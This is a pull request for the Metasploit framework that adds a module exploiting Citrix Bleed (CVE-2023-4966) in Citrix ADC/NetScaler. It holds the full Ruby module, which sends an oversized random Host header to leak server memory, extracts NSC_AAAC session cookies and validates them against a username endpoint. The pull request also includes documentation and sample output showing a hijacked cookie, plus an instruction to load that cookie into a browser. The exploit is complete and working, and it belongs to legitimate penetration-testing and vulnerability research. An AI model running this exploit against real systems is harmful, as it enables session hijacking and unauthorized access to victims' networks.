### PR TITLE
Add module for Citrix Bleed (CVE-2023-4966)

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/citrix_bleed_cve_2023_4966.md
+++ b/documentation/modules/auxiliary/scanner/http/citrix_bleed_cve_2023_4966.md
@@ -1,6 +1,6 @@
 ## Vulnerable Application
 
-This module scans for a vulnerability that allows an remote, unauthenticated attacker to leak memory for a target Citrix
+This module scans for a vulnerability that allows a remote, unauthenticated attacker to leak memory for a target Citrix
 ADC server. The leaked memory is then scanned for session cookies which can be hijacked if found.
 
 ## Verification Steps

--- a/documentation/modules/auxiliary/scanner/http/citrix_bleed_cve_2023_4966.md
+++ b/documentation/modules/auxiliary/scanner/http/citrix_bleed_cve_2023_4966.md
@@ -1,0 +1,50 @@
+## Vulnerable Application
+
+This module scans for a vulnerability that allows an remote, unauthenticated attacker to leak memory for a target Citrix
+ADC server. The leaked memory is then scanned for session cookies which can be hijacked if found.
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/http/citrix_bleed_cve_2023_4966`
+4. Do: `set RHOSTS`
+5. Do: `run`
+
+## Options
+
+## Scenarios
+Specific demo of using the module that might be useful in a real world scenario.
+
+### Citrix ADC 13.1-48.47
+
+NetScaler VPX instance for VMware ESX from `NSVPX-ESX-13.1-48.47_nc_64`.
+
+```
+msf6 auxiliary(scanner/http/citrix_bleed_cve_2023_4966) > show options 
+
+Module options (auxiliary/scanner/http/citrix_bleed_cve_2023_4966):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.159.150  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      443              yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       Base path
+   THREADS    20               yes       The number of concurrent threads (max one per host)
+   VHOST                       no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(scanner/http/citrix_bleed_cve_2023_4966) > run
+
+[+] Cookie: NSC_AAAC=fdac8de9ed76012688b4d33e9d5f74b00c3a0818745525d5f4f58455e445a4a42 Username: metasploit
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/citrix_bleed_cve_2023_4966) >
+```
+
+Once the cookie has been leaked, load it into the browser using the developer tools.

--- a/modules/auxiliary/scanner/http/citrix_bleed_cve_2023_4966.rb
+++ b/modules/auxiliary/scanner/http/citrix_bleed_cve_2023_4966.rb
@@ -68,19 +68,27 @@ class MetasploitModule < Msf::Auxiliary
         'Connection' => 'close'
       }
     )
+    return nil unless res&.code == 200
+    return nil unless res.headers['Content-Type'].present?
+    return nil unless res.headers['Content-Type'].downcase.start_with?('application/json')
 
+    username = nil
     res.body.scan(/([0-9a-f]{32,65})/i).each do |cookie|
       cookie = cookie.first
       username = get_user_for_cookie(cookie)
       next unless username
 
-      print_good("Cookie: #{COOKIE_NAME}=#{cookie} username: #{username}")
+      print_good("Cookie: #{COOKIE_NAME}=#{cookie} Username: #{username}")
       report_vuln(
         host: rhost,
         port: rport,
         name: name,
         refs: references
       )
+    end
+
+    unless username
+      print_status('No valid cookies were leaked from the target.')
     end
   end
 end

--- a/modules/auxiliary/scanner/http/citrix_bleed_cve_2023_4966.rb
+++ b/modules/auxiliary/scanner/http/citrix_bleed_cve_2023_4966.rb
@@ -1,0 +1,86 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  COOKIE_NAME = 'NSC_AAAC'.freeze
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Citrix ADC (NetScaler) Bleed Scanner',
+        'Description' => %q{
+          This module scans for a vulnerability that allows an remote, unauthenticated attacker to leak memory for a
+          target Citrix ADC server. The leaked memory is then scanned for session cookies which can be hijacked if found.
+        },
+        'Author' => [
+          'Dylan Pindur', # original assetnote writeup
+          'Spencer McIntyre' # metasploit module
+        ],
+        'References' => [
+          ['CVE', '2023-4966'],
+          ['URL', 'https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966']
+        ],
+        'DisclosureDate' => '2023-10-25',
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [],
+          'SideEffects' => [],
+          'AKA' => ['Citrix Bleed']
+        },
+        'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def get_user_for_cookie(cookie)
+    vprint_status("Checking cookie: #{cookie}")
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'logon/LogonPoint/Authentication/GetUserName'),
+      'headers' => {
+        'Cookie' => "#{COOKIE_NAME}=#{cookie}"
+      }
+    )
+    return nil unless res&.code == 200
+
+    res.body.strip
+  end
+
+  def run_host(_target_host)
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'oauth/idp/.well-known/openid-configuration'),
+      'headers' => {
+        'Host' => Rex::Text.rand_text_alpha(24812),
+        'Connection' => 'close'
+      }
+    )
+
+    res.body.scan(/([0-9a-f]{32,65})/i).each do |cookie|
+      cookie = cookie.first
+      username = get_user_for_cookie(cookie)
+      next unless username
+
+      print_good("Cookie: #{COOKIE_NAME}=#{cookie} username: #{username}")
+      report_vuln(
+        host: rhost,
+        port: rport,
+        name: name,
+        refs: references
+      )
+    end
+  end
+end

--- a/modules/auxiliary/scanner/http/citrix_bleed_cve_2023_4966.rb
+++ b/modules/auxiliary/scanner/http/citrix_bleed_cve_2023_4966.rb
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Auxiliary
         info,
         'Name' => 'Citrix ADC (NetScaler) Bleed Scanner',
         'Description' => %q{
-          This module scans for a vulnerability that allows an remote, unauthenticated attacker to leak memory for a
+          This module scans for a vulnerability that allows a remote, unauthenticated attacker to leak memory for a
           target Citrix ADC server. The leaked memory is then scanned for session cookies which can be hijacked if found.
         },
         'Author' => [
@@ -79,16 +79,27 @@ class MetasploitModule < Msf::Auxiliary
       next unless username
 
       print_good("Cookie: #{COOKIE_NAME}=#{cookie} Username: #{username}")
-      report_vuln(
-        host: rhost,
-        port: rport,
-        name: name,
-        refs: references
-      )
+      report_vuln
     end
 
-    unless username
-      print_status('No valid cookies were leaked from the target.')
+    return if username
+
+    begin
+      JSON.parse(res.body)
+    rescue JSON::ParserError
+      print_status('The target is vulnerable but no valid cookies were leaked.')
+      report_vuln
+    else
+      print_status('The target does not appear vulnerable.')
     end
+  end
+
+  def report_vuln
+    super(
+      host: rhost,
+      port: rport,
+      name: name,
+      refs: references
+    )
   end
 end

--- a/modules/auxiliary/scanner/http/citrix_bleed_cve_2023_4966.rb
+++ b/modules/auxiliary/scanner/http/citrix_bleed_cve_2023_4966.rb
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def get_user_for_cookie(cookie)
-    vprint_status("Checking cookie: #{cookie}")
+    vprint_status("#{peer} - Checking cookie: #{cookie}")
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'logon/LogonPoint/Authentication/GetUserName'),
@@ -78,7 +78,7 @@ class MetasploitModule < Msf::Auxiliary
       username = get_user_for_cookie(cookie)
       next unless username
 
-      print_good("Cookie: #{COOKIE_NAME}=#{cookie} Username: #{username}")
+      print_good("#{peer} - Cookie: #{COOKIE_NAME}=#{cookie} Username: #{username}")
       report_vuln
     end
 
@@ -87,10 +87,10 @@ class MetasploitModule < Msf::Auxiliary
     begin
       JSON.parse(res.body)
     rescue JSON::ParserError
-      print_status('The target is vulnerable but no valid cookies were leaked.')
+      print_status("#{peer} - The target is vulnerable but no valid cookies were leaked.")
       report_vuln
     else
-      print_status('The target does not appear vulnerable.')
+      print_status("#{peer} - The target does not appear vulnerable.")
     end
   end
 


### PR DESCRIPTION
This adds a module for exploiting CVE-2023-4966 which is a memory leak in Citrix ADC servers that can be used to leak session cookies of authenticated users.

A user needs to be logged in for the vulnerability to be usable to leak a session cookie. While testing my 13.1-48.47 target, with multiple users authenticated it appears that the session cookie that is leaked is consistently the last user that authenticated and not the session cookie of the last request that was received. For that reason, it doesn't make a lot of sense to make multiple attempts to leak cookies in a short time frame as I was originally considering (say 1 request per second over 10 seconds). If the observations are correct, this would only be beneficial and leak multiple cookies if users were login within that time period.

##  Example Output
```
msf6 auxiliary(scanner/http/citrix_bleed_cve_2023_4966) > show options 

Module options (auxiliary/scanner/http/citrix_bleed_cve_2023_4966):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.150  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path
   THREADS    20               yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/http/citrix_bleed_cve_2023_4966) > rerun VERBOSE=true
[*] Reloading module...

[*] Checking cookie: b6e7bf2ef97ef32da90e62f5e4be00b00c3a0818745525d5f4f58455e445a4a42
[+] Cookie: NSC_AAAC=b6e7bf2ef97ef32da90e62f5e4be00b00c3a0818745525d5f4f58455e445a4a42 username: metasploit
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/citrix_bleed_cve_2023_4966) >
```

Closes #18486